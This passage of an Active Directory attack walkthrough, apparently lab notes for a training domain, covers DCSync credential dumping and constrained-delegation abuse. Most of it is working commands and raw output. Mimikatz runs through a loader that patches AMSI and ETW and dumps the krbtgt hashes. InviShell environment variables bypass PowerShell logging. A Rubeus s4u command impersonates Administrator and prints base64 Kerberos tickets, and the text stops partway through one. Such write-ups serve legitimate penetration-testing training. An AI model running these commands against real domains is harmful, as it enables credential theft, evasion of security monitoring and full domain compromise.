Renew Time: 7/9/2024 22:01:43 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

With this ticket loaded into the memory we can execute the DCSync attack.
C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
 01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Constrained Delegation
Constrained Delegation is a security feature in Kerberos that allows a service to delegate user credentials
to other services on the same server or to remote servers within a domain, but only for specified services.
This contrasts with unconstrained delegation, where a service can delegate credentials to any service.

Restricts the service to which the configures server can act on behalf of the client.

Does not leverage TGTs as Unconstrained does

Two new Service-for-User Kerberos extensions

• s4u2self: (The Kerberos Protocol Transition extension) Allows a service to obtain a service ticket
to itself as an evidence that a client has authenticated. Any service (account with SPN registered)
can invoke s4u2self. The resulting service ticket may vary depending on the rights of the service
account.

• s4u2Proxy: (The Kerberos Constrained Delegation extension) Allows a service to obtain a service
ticket on behalf of a client to a different service. A service ticket is required as evidence that the
client has authenticated.
Two ways to configure the delegation:

• Kerberos Only: The service can delete when the client is authenticating using kerberos only (Uses
s4u2proxy).

• Protocol Transition: The service can delegate regardless of how the client authenticates (uses
s42u2self and s4u2proxy).

Setting up any of these configurations requires Domain Admin or Enterprise Admin accounts.
(SeEnableDelegation)

Service to which a machine can delegate to are included in its ms-DSAllowedToDelegateTo attribute

For our example, we have a user who is trying to authenticate to a backend database through a front end
web server.

Kerberos Only
Step-1: AS-REQ: User Authenticates to DC and requests and a TGT

Step-2: AS-REP: DC creates a signed and encrypted TGT and a session key to the user.

Step-3: TGS- REQ: User presents the TGT to the DC and requests a TGS for the Web service

Step-4: The DC receives the TGS request from the user and responds with a service ticket and a session
key.

Step-5: AP-REQ: The user presents the TGS to the Web Server which can be decrypted by the service.

Step-6: The Web Server obtains the service ticket from the user and stores it.

Step-7: Now the Web Server on behalf of the client requests a service ticket to the backend database. In
this request it includes its own TGT and the service ticket which the user used to authenticate with the
Web Server. This request is called the s4u2proxy.

Step-8: The DC receives the request from the Web Server and decrypts the original service ticket from the
user (Along with the Web Server’s TGT) and confirms that the user has authenticated to the Web Server.

Step-9: The DC then verifies the Web Server’s msDS-AllowedTODelegateTo attribute. From that attribute,
DC obtains the service and the Database server to which the computer can delegate the credentials to.
The DC then responds to the Web Server with the service ticket of the Database.

Step-10: The Web server then presents the new service ticket to the Database server which it decrypts.

Step-11: AP-REP using mutual session key between the Database server and the Web Server

Step-12: AP-REP using mutual session key between the Web Server and the user.

Protocol Transition
We can use the same example with a slight variation for this scenario as well. In the previous example,
the user uses Kerberos protocol to login to the Web Server initially. For protocol transition, we assume
that the user is logging on to the Web Server using a non-Kerberos protocol like NTLM, Form-
Authentication etc.

Step-1: The user authenticates to the Web Server using a non-Kerberos protocol.

Step-2: Since the user has authenticated to the Web Server using a non-Kerberos protocol, the user
doesn’t have a service ticket which the Web Server can use to invoke s42uproxy.

Step-3: The Web Server on behalf of the user requests a service ticket with its own TGT and the target
service is the Web Server itself. This is s4u2self.

Step-4: The DC receives this request and verifies if the Web Server has the setting
"TRUSTED_TO_AUTH_FOR_DELEGATION" attribute set on it. If the attribute is set, then the DC sends a
Service ticket to the Web Server.

Step-5: The Web Service receives the service ticket and stores it.

Step-6: Now the Web Server on behalf of the client requests a service ticket to the backend database. In
this request it includes its own TGT and the service ticket which it obtained by invoking s4u2self. (This is
the s4u2proxy)

Step-7: The DC receives the request from the Web Server and decrypts the service ticket (from s4u2self)
(Along with the Web Server’s TGT) and confirms that the user has authenticated to the Web Server.

Step-8: The DC then verifies the Web Server’s msDS-AllowedTODelegateTo attribute. From that attribute,
DC obtains the service and the Database server to which the computer can delegate the credentials to.
The DC then responds to the Web Server with the service ticket of the Database.

Step-9: The Web server then presents the new service ticket to the Database server which it decrypts.

Step-10: AP-REP using mutual session key between the Database server and the Web Server

Step-11: The Web server responds to the user using the initial protocol with which the user has
authenticated.

Enumeration
Using PowerView
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainUser -TrustedToAuth
logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

From an attacker’s perspective, if we can compromise the websvc account, we can access the file system
service (CIFS) on the machine dcorp-mssql.dollarcorp.moneycorp.local as any user including domain
admin.
PS C:\Windows\system32> Get-DomainComputer -TrustedToAuth

pwdlastset : 11/11/2022 11:16:12 PM

logoncount : 80
badpasswordtime : 5/18/2024 3:13:09 AM
distinguishedname : CN=DCORP-
ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/26/2024 9:02:25 PM
whencreated : 11/12/2022 7:16:12 AM
samaccountname : DCORP-ADMINSRV$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 6/27/2024 4:02:25 AM
accountexpires : NEVER
countrycode : 0
operatingsystem : Windows Server 2022 Datacenter
instancetype : 4
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION
objectguid : 2e036483-7f45-4416-8a62-893618556370
operatingsystemversion : 10.0 (20348)
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/15/2022 4:16:45 AM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {WSMAN/dcorp-adminsrv, WSMAN/dcorp-
adminsrv.dollarcorp.moneycorp.local,
TERMSRV/DCORP-ADMINSRV, TERMSRV/dcorp-
adminsrv.dollarcorp.moneycorp.local...}
usncreated : 13891
usnchanged : 1164786
lastlogon : 7/3/2024 8:38:27 AM
badpwdcount : 0
cn : DCORP-ADMINSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1105
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-ADMINSRV
dnshostname : dcorp-adminsrv.dollarcorp.moneycorp.local

From an attacker’s perspective, if we can compromise the machine account of DCORP-ADMNSRV, we can
access the TIME service on the machine dcorp-dc.dollarcorp.moneycorp.local as any user including
domain admin.

Using Active directory Module

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\AD\tools\ADModule-

master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\AD\tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> Get-ADObject -Filter { msDS-AllowedToDelegateTo -ne "$null" } -Properties
msDS-AllowedToDelegateTo

DistinguishedName : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
msDS-AllowedToDelegateTo : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
Name : DCORP-ADMINSRV
ObjectClass : computer
ObjectGUID : 2e036483-7f45-4416-8a62-893618556370

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

msDS-AllowedToDelegateTo : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe

Performing the attack

Using websvc

PS C:\Windows\system32> Get-DomainUser -TrustedToAuth

logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

If we can compromise the websvc account, we can access the file system service (CIFS) on the machine
dcorp-mssql.dollarcorp.moneycorp.local as any user including domain admin. We already obtained the
hash of the websvc account during the lateral movement phase. We will now open a command prompt
with the websvc account privileges.

With Rubeus, we can now impersonate any user to access the CIFS service on the machine dcorp-
mssql.dollarcorp.moneycorp.local. For this we use the Rubeus s4u module.
C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$\
Access is denied.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc

/aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
/impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:

2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRF6wC8PyqAJ0Yibv0CiCoWOqmYJK69Cklsxy8DQa3Fz/q2jRSm
YmwHZ0oqKCMIdAs3mhQYUEI6gtlA4zRjKve2k4Iw4wFC+epVjyb+dzGNj84r94KXxtmp3Gtjy9dr5tXw
kPE1Ra/l6lOclzrwczYxv1nJWF+NTD+HRQex01aCn88j8ZXtQk62KGPdaZj6rTSltJr3vFwt3aPp1SBy
WB2FJId3XIaP9N2vIuQvJICdSVVMn7OVFQ2BS7uHTVlTipODSeeLdQYCLuIzVZ9Mg76KBm3pUAqbE0x7
0LhkRtih5rmMAebF2CCc/ARAY2C0IYhCxiHp0Q1HQzP7YTf59JVmwji8+RYLPfaWmgCySFM8LVcJhQkY
/x9SsZ9y7N5f7y2YIXeOFVuPAY6eqy4kavnyYsoQaUebDZJxSdSpUOB4fwUpaaEz50tjJXGFsfgx5gQg
MwIKoKoazriUsJP+hRRujb/keq8vzom+U7eAzIMbYQPXGF71qKtatXOPywr+zGDPkQTbW22kMsYetUmt
2T2tPUaXx8vZMG5pCE6OC4jPTwV4SqbEAqNXDQdxwtSMQhd4DMOpNh2VUblZDFj/yVKZ1ht5gCbaBIO+
W1oVGTUdVuANNGtzhVkV/wva5adfvLGanlN3TzXUPE5Cgdxz4SmMpIzcNVeqxz86adfxSvIYhNtsM526
dNzMSHaVjL6d6mTEAhTXREOrBnWDmrovmEg74NmmJKMXVCYLxdinu2dJGiWLPRFEvWV1bAwlVFRRc1qW
48/mx2rBc36VEy0aKPG/o7LxXsZPupAqysZdYY3VVkTZ328F4gFvVwEYDb1UDvoB7tj5XSJpEdK+mM37
I0EBev46L2U1RLtT6wGGNN1VVq8GYoYdQNIGwH+yjITphdUx+HkxPPB4bOnJnDuSlPXe4wF2VqKi2qeb
WLvHnNsD0kK5wakgDz9COxDXbE2SvDLnPuTZVr7V5ycrawXGn9SweC7sBHMNKK2I0PijZDhx9rjQKUmh
KkZW3bFMh3w6MV5s8Z6I7ri+2pdivQSpXBY+rE9KXCwYqbdLay9iQh1osOwtbEvVNR6IHOPagSXS4I5g
SiWO5+aZMV07WqIOkU9wk+aBltt/bOtH0nEvtx2uiEO78QZJ0cy68ZAK3KJyMhczGCfua3bzxvStgdxU
zr0L4mrM0Ultz13JIcVjtu6/JuOut2bJT+tuub/DC+lOtUlcJTZ5b4RU2Ku1lQ96FvROIVz70hBKZSUO
8fEckOZWILVH9ufC7BE+dgbLjMRZFIt0fNpHlvf7bYnwnE6s/dhH0r9x/pNdGL6N7Xa2SajNlRUTx1zp
XMYETQPcWVumyjhmMBgCLondrU2/48VTvldeN0WHsO7HxR8DMetdJmVKoRvCCus6tQa3UQi2HE1tx3Zk
IedtZiVdyfM8sZnwMdfV40nk5p74jvkaqCfA4MTqMIMx4sK1G6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCw5EcwvEbHe2H4tf7YNVz8a5fmSe9jjbDCysx2/t0uMaEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE1MzMzOFqmERgPMjAyNDA3MDQwMTMzMzhapxEYDzIwMjQwNzEwMTUzMzM4WqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: '[email protected]'

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to '[email protected]'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOAZvBsS
uyc4huMJKS7ihjKcqgU2l+dXEUHgwJt/IFZRjMC3eum5t5MCEvxxwE5+xPu1y8ZWvtIkP70lHbd9ddYV
STBXRijM+HDA19650xLf/gePiIM/lmUMR/Q2WvEEQaynhUaZ/KR4V5FXcJXDVO+SckEgVDoWrjB3EHVc
sTwdT+DUp+WeBgLIyJmpdAYoz0SrjTonJEQ14dxX138a9bp3j50uWEjWA4pcAuewC9vpkDCdNIvtajCu
No8ADb0Ijpx67m70NNHU+yYeUUC1RZh9Hacyq2FV59CAMLtZ+G1TstFnltpBGriA8J/OXjynSh8uutz1
ArqOIUTP2lNeG3evZA0Qc/l2GvwdsKignG7EoCFe6iK7r0d4v4Hx9UPGe3PCLJURi+EYx7eQxjGsoRST
oeOgVWrgeL1NKNm9kOag1jhY18WL1v/oAthyIR6rCELqHekW3gXDZyErEBp+mn5X8919t9IHEnOlZ9ML
oejyNmP86yxO49yrpnCHGJ13WvTg3/Eb/n86iS9tAokWRHWGijzrUj60jYNqraE2P/t/KKyUtJ8BHqAv
BMQhNK7tNMZ4gX+LOkqzLgR0HaTBLud2xoIWxK3BwLub24IPYNY+oGkn+Ecvj+UTCLOe/lD0I13FDZsC
/aYMn4XH1uzDtao2vOBq4akPFtUurf7uJehWqsfmJdi1aeN2TcEYiz+S/hHd4m2r1WLVU/ygb5r2Euhd
ibkcy0ntb8dkrc7QVjSzNbZOOe7mzpBRwDd+vW1tJF6aTtY1I6VCBDHOjpQSyJDbnPdzuI2mlr/IzI7T
4kFwYvpouChJeHRs42weMCaL1+QHxlEl8qnsKjm6LiMc/UXu0Unqlz+zDSaRNK6g/hugniUGGkqDIuvz
KqqToOkxhrJ9OKJLKsWAPCT8/ULdgU/2uBz5Qu2gSkBZIbuj6BsQ7jHMPgSld1lFTuL6fkubDe5C+NQF
VRkAn5mUPY458knWTolvrua4IyAXz96YukAZa4ZlAE72CU7OiLsM5qlgblZD8sVcVDCa+z+QsRWjlqCi
rviYaKc4RVSO6RHRWLs2KGvTMC+gCBucXvK6BdiyLFagjYKER8uLh/lUrgI5BLbMkDmlsmO3N2Irxauj
0Cqau/70QEzh2K8JFROf8AJy9Ux37BrbhvPsPMmHh7kkHHPZSPTrz+1Qr8fSQMN6siSlhWHTSpNqIvhs
dSj5MRU+4Haj9M6dOKCGt85WTMAxjs/HUbFD4LqR6p5iN1EKsXKQLBHnpp3O9aZN/2cApdxmts/h9nCE
hfGxYtI+KH7pMpCtTcKKs+74JHWECbNXhhE4dD3zKr4W0CKEpOSiUBrPOkwBoLuLZHIag0qTibs8raOg
sX6jY7MeXv/wFXl9idEpTvq6kFu1uxSW3DaMLHTwgiW1sgFRVjgTBlD4ldy+XvXXr8qLFQgFataZmxFC
XKmt1kbWzJTZvcyv/DT7qKyHE9hYLpv8n84sxM0PL8rLBzRqX2Ph+VVS2jw44shJ8l23qDgr5pUFUqf7
pUPYdx5SiroWV/iIo5e2IO25QEfs5fC20LUmBv2dur2HMgn+pp6EIMkscA/a+VQ6v02vReRJC1vrXeqj
KyNIHVM7GEi/nJ9xxhKnlIg64fYDQO40fYX3AxaVzvXLQC7+uHFdQhX2YGejgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCkviUBg9HTDsy2wR/lU3arTN5pB4TgeoUpViqJh5PL
0KEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNTMzMzlaphEYDzIwMjQwNzA0MDEzMzM4WqcRGA8yMDI0MDcxMDE1
MzMzOFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-

mssql.dollarcorp.moneycorp.LOCAL'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

doIHcDCCB2ygAwIBBaEDAgEWooIGSDCCBkRhggZAMIIGPKADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMojkwN6ADAgECoTAwLhsEQ0lGUxsmZGNvcnAtbXNzcWwuZG9sbGFyY29ycC5tb25leWNv
cnAuTE9DQUyjggXaMIIF1qADAgESoQMCAQGiggXIBIIFxJZPPvQE2q3b4ga8BndLQ/ACp8SNL3LL8tqk
LfkYnpEZbWRyX9DxT0MjTMODAkAIsdLYV7kSD8DO3bHuG+ZgWOD85YrZyOa7CkG3NfuaoZSPtampulik
Uudln0gOBt9/9vn3a2RxABgWorjjxp+B20raiYj8KbfZNDcq1gYjdjxU4Ak5ngkt04hz1m2010Whsn5W
PlnbMcSJYEqB1vpxr/z7RZKUxHlATKt0XOPn7w4gysgCIsSx8tFuyGHlhgRzcJabXh+Ac0NAXDC+eRg+
6Qu+YYeS0vbSfJQltY27By5Nbs1Bli0k0L8FvhZXuvu2+uvr7kdAyY/wKWpqibxmelS4ubdoIB2FRLXp
SsGB1b3Fguq/TKY8ThV0+EWVUZCWLXLcye6PE7oGFLNlEFDB93+TD6b5o006BxrhVNd4N3IEgFLzluP6
L7fPAqu3QFy1NRYo3fIB+sQ7GWVK8B99lG2/rB9uMG7hXS59T2cy71/XPOvFZFW/K3TPZBEXVJwPtVok
IMzp4a/zs4JnPc5GG0g/zIy+pZfFq1ZmCxnix4YrF6/eP+ZTuLegOGKs59KspjN9cBaadTLHe2U7QjgG
cT3TjIVpgCDptW9rL8Za2nwq/XczRcO5RB9CKQzj+IPXcXat/U9w9RTwQcyob7TX6/Ak92tNu6mOoz/M
rtwYbn7w4/A2gRRLIviIQCX7kgOVf46jvGhNakZz8Jw+JtiB1bluxVa0nBxmVHgvP054P1CnSuUQhs5C
zIDMLRosKPmvBkWAh4ZeSna1Ih6NdUJj03Lq7GN68xO+PlZ/1Q9685p+hQl1eTl4ZDB+jWkaJnPnly+z
r/GZ2tK1k2D75aFkQ8gkSE7TytO0U9NXUsW8mDc4BXOabGsKGLTyUeSAvCd1PV5gwqtTDqU7KVeJQ2PY
CJaxX/yNiwrWAq1OnTgv7eEICw3L/8jIvQFPMWLAnzbGj5DqC9laCkj/jGYPIzB6l1s9Sq8UFa0uOK+A
RCdElzODuys7Z2QbdV5EiIe51raM8jSQVRhP5aWRk37lrNsavRvwOCjP6toOrt9S3BdhZ1lAiCgq5rae
DxTBwgjCFlRmhQklIQKH1c/rPxgU7wO2hrM9rXOqJir+nppykvplO8hUA3ZaT84igb2kwQw2mZ+JJEuH
MB/ER/bW2bIqBKdcHZIDFr+7JVOcr8/6aR4RqctaqlV6W1WXBk2rKtWNcguUZs3bLM1vTc7vnUbBOoIx
Pjhsa5wtLgT47thfAAXl6BI3l/DJ1H44P9rwyGTOguOsyIvIj3KPrDYoEejIzTrma+my1dToonsCyXGu
Fl3ZK22H+9XbHw4CtbO9GffYVhixT4HBvAo/oTlSTHplYIWWcfRUzKAjufmeNbs6Yu+o+eNo0WXpG63V
 f5jrZel7T69HLG27oWFw8uDjBcyTM8499gzJ0g+ZKK9FpKE1jZlTf4w1+30Ar3FQJLyPs/2/h7zcn3F8
3NHpZ3HegwSTqDNR8/5rg0Y/0+zrpQWi7ZFB86uTnN+g39tNyTlcZ84f/ZwmyXBpTP6MfyaixNSZfjqf
